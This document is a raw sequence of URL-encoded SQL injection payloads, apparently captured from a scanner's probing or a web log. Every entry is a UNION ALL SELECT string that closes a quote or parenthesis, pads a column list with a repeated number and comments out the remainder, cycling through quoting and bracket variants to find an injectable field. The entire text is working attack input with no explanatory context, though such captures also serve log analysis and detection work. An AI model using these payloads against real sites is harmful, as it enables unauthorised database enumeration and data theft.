-9978%22%29%20UNION%20ALL%20SELECT%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957%2C%207957--%20%20AND%20%28%22Wtcu%22%20LIKE%20%22Wtcu -7603%22%29%20UNION%20ALL%20SELECT%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399--%20%20AND%20%28%22kazl%22%20LIKE%20%22kazl -8008%22%29%20UNION%20ALL%20SELECT%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565%2C%205565--%20%20AND%20%28%22aHhx%22%20LIKE%20%22aHhx -2740%22%29%20UNION%20ALL%20SELECT%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325%2C%207325--%20%20AND%20%28%22SoQo%22%20LIKE%20%22SoQo -4899%22%29%29%20UNION%20ALL%20SELECT%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544%2C%209544--%20%20AND%20%28%28%22DWEo%22%20LIKE%20%22DWEo -7775%22%29%29%20UNION%20ALL%20SELECT%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425%2C%205425--%20%20AND%20%28%28%22xaJE%22%20LIKE%20%22xaJE -3590%22%29%29%20UNION%20ALL%20SELECT%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939%2C%206939--%20%20AND%20%28%28%22ygsQ%22%20LIKE%20%22ygsQ -2718%22%29%29%20UNION%20ALL%20SELECT%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718%2C%203718--%20%20AND%20%28%28%22ZNbh%22%20LIKE%20%22ZNbh -2443%22%29%29%20UNION%20ALL%20SELECT%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527%2C%204527--%20%20AND%20%28%28%22FcHD%22%20LIKE%20%22FcHD -9965%22%29%29%20UNION%20ALL%20SELECT%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542%2C%208542--%20%20AND%20%28%28%22ozmv%22%20LIKE%20%22ozmv -5662%22%29%29%20UNION%20ALL%20SELECT%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964--%20%20AND%20%28%28%22TYak%22%20LIKE%20%22TYak -1675%22%29%29%20UNION%20ALL%20SELECT%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031%2C%208031--%20%20AND%20%28%28%22vnsH%22%20LIKE%20%22vnsH -9884%22%29%29%20UNION%20ALL%20SELECT%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794%2C%207794--%20%20AND%20%28%28%22JbsZ%22%20LIKE%20%22JbsZ -3052%22%29%29%20UNION%20ALL%20SELECT%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162--%20%20AND%20%28%28%22cTcS%22%20LIKE%20%22cTcS -9176%22%29%29%29%20UNION%20ALL%20SELECT%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978%2C%201978--%20%20AND%20%28%28%28%22iBYL%22%20LIKE%20%22iBYL -4697%22%29%29%29%20UNION%20ALL%20SELECT%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928%2C%201928--%20%20AND%20%28%28%28%22iJlt%22%20LIKE%20%22iJlt -6405%22%29%29%29%20UNION%20ALL%20SELECT%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323%2C%203323--%20%20AND%20%28%28%28%22Lyna%22%20LIKE%20%22Lyna -9578%22%29%29%29%20UNION%20ALL%20SELECT%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447%2C%202447--%20%20AND%20%28%28%28%22plxN%22%20LIKE%20%22plxN -2868%22%29%29%29%20UNION%20ALL%20SELECT%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452--%20%20AND%20%28%28%28%22ciwO%22%20LIKE%20%22ciwO -9897%22%29%29%29%20UNION%20ALL%20SELECT%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506--%20%20AND%20%28%28%28%22wgcy%22%20LIKE%20%22wgcy -6470%22%29%29%29%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147--%20%20AND%20%28%28%28%22xXCh%22%20LIKE%20%22xXCh -9840%22%29%29%29%20UNION%20ALL%20SELECT%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496%2C%207496--%20%20AND%20%28%28%28%22ajpm%22%20LIKE%20%22ajpm -5105%22%29%29%29%20UNION%20ALL%20SELECT%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740%2C%207740--%20%20AND%20%28%28%28%22PoDk%22%20LIKE%20%22PoDk -2385%22%29%29%29%20UNION%20ALL%20SELECT%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785%2C%206785--%20%20AND%20%28%28%28%22ftAp%22%20LIKE%20%22ftAp -4118%22%20UNION%20ALL%20SELECT%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689%2C%205689--%20%20AND%20%22ANXN%22%20LIKE%20%22ANXN -1788%22%20UNION%20ALL%20SELECT%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174%2C%205174--%20%20AND%20%22xbSS%22%20LIKE%20%22xbSS -6746%22%20UNION%20ALL%20SELECT%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821%2C%207821--%20%20AND%20%22hVem%22%20LIKE%20%22hVem -6707%22%20UNION%20ALL%20SELECT%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615%2C%202615--%20%20AND%20%22zXau%22%20LIKE%20%22zXau -2382%22%20UNION%20ALL%20SELECT%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747%2C%207747--%20%20AND%20%22lRAN%22%20LIKE%20%22lRAN -7943%22%20UNION%20ALL%20SELECT%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299%2C%204299--%20%20AND%20%22yEgt%22%20LIKE%20%22yEgt -1774%22%20UNION%20ALL%20SELECT%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854--%20%20AND%20%22mCzJ%22%20LIKE%20%22mCzJ -4844%22%20UNION%20ALL%20SELECT%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320--%20%20AND%20%22nlln%22%20LIKE%20%22nlln -1470%22%20UNION%20ALL%20SELECT%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674%2C%204674--%20%20AND%20%22lZUI%22%20LIKE%20%22lZUI -4170%22%20UNION%20ALL%20SELECT%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270%2C%203270--%20%20AND%20%22DIRn%22%20LIKE%20%22DIRn -1518%29%20WHERE%203842%3D3842%20UNION%20ALL%20SELECT%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842--%20 -8050%29%20WHERE%205603%3D5603%20UNION%20ALL%20SELECT%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603%2C%205603--%20 -4620%29%20WHERE%203317%3D3317%20UNION%20ALL%20SELECT%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317--%20 -9008%29%20WHERE%201365%3D1365%20UNION%20ALL%20SELECT%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365%2C%201365--%20 -9785%29%20WHERE%204004%3D4004%20UNION%20ALL%20SELECT%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004%2C%204004--%20 -7716%29%20WHERE%204398%3D4398%20UNION%20ALL%20SELECT%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398--%20 -5520%29%20WHERE%206089%3D6089%20UNION%20ALL%20SELECT%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089%2C%206089--%20 -2869%29%20WHERE%204215%3D4215%20UNION%20ALL%20SELECT%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215--%20 -8836%29%20WHERE%205610%3D5610%20UNION%20ALL%20SELECT%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610--%20 -1875%29%20WHERE%208582%3D8582%20UNION%20ALL%20SELECT%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582--%20 -8789%27%29%20WHERE%205163%3D5163%20UNION%20ALL%20SELECT%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163%2C%205163--%20 -4274%27%29%20WHERE%208650%3D8650%20UNION%20ALL%20SELECT%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650--%20 -3067%27%29%20WHERE%203091%3D3091%20UNION%20ALL%20SELECT%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091%2C%203091--%20 -3314%27%29%20WHERE%205661%3D5661%20UNION%20ALL%20SELECT%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661--%20 -8792%27%29%20WHERE%207392%3D7392%20UNION%20ALL%20SELECT%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392--%20 -5416%27%29%20WHERE%207855%3D7855%20UNION%20ALL%20SELECT%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855%2C%207855--%20 -9238%27%29%20WHERE%202770%3D2770%20UNION%20ALL%20SELECT%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770--%20 -2980%27%29%20WHERE%209082%3D9082%20UNION%20ALL%20SELECT%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082--%20 -9865%27%29%20WHERE%203830%3D3830%20UNION%20ALL%20SELECT%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830%2C%203830--%20 -2540%27%29%20WHERE%205989%3D5989%20UNION%20ALL%20SELECT%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989--%20 -1256%27%20WHERE%209368%3D9368%20UNION%20ALL%20SELECT%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368%2C%209368--%20 -3360%27%20WHERE%206150%3D6150%20UNION%20ALL%20SELECT%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150%2C%206150--%20 -5065%27%20WHERE%208038%3D8038%20UNION%20ALL%20SELECT%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038%2C%208038--%20 